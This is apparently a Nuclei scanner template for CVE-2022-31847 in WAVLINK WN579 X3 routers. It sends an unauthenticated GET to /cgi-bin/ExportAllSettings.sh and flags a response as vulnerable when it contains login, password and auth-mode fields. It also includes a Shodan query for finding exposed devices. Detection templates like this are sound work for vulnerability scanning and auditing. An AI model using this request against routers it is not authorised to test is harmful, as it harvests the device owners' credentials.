40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: CVE-2022-31847
|
|
|
|
info:
|
|
name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.
|
|
reference:
|
|
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31847
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-31847
|
|
cwe-id: CWE-668
|
|
metadata:
|
|
shodan-query: http.html:"Wavlink"
|
|
verified: "true"
|
|
tags: cve,cve2022,wavlink,exposure
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Login='
|
|
- 'Password='
|
|
- 'Model='
|
|
- 'AuthMode='
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|